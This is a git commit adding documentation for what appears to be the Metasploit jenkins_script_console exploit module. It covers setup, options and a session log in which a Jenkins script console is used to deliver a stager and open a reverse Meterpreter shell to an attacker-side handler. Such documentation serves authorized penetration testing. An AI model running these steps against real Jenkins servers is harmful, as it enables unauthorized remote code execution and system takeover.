Add documentation for jenkins_script_console

bug/bundler_fix
Spencer McIntyre 2016-10-29 16:50:47 -04:00
parent 0b23365881
commit 89376102db
1 changed files with 66 additions and 0 deletions

View File

@ -0,0 +1,66 @@
## Vulnerable Application
Jenkins can be downloaded from [jenkins.io](https://jenkins.io/) where
binaries are available for a variety of operating systems. Both LTS and weekly
builds are available.
Default settings have the script console enabled and require a valid user
account on order to access it. A known account can be used with this module by
setting the `USERNAME` and `PASSWORD` options.
## Verification Steps
Example steps in this format:
1. Install the application
1. Start msfconsole
1. Do: ```use exploit/multi/http/jenkins_script_console```
1. Do: ```set RHOST [target host]```
1. Do: ```set TARGET [target id]```
1. Do: ```exploit```
1. You should get a shell.
## Options
**PASSWORD**
A password to an account that has access to the script console. This is only
necessary if the Jenkins instance has been configured to require
authentication.
**TARGETURI**
The path to the target instance of Jenkins.
**USERNAME**
A username to an account that has access to the script console. This is only
necessary if the Jenkins instance has been configured to require
authentication.
## Scenarios
Example usage against a Linux target server.
```
msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set RHOST 192.168.1.154
msf exploit(jenkins_script_console) > set TARGET 1
msf exploit(jenkins_script_console) > exploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 192.168.1.154:8080 - Sending Linux stager...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.154
[*] Meterpreter session 12 opened (192.168.1.128:4444 -> 192.168.1.154:46726) at 2013-01-20 13:37:06 +0100
[!] Deleting /tmp/IVVrDu payload file
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)
Architecture : i686
Meterpreter : x86/linux
```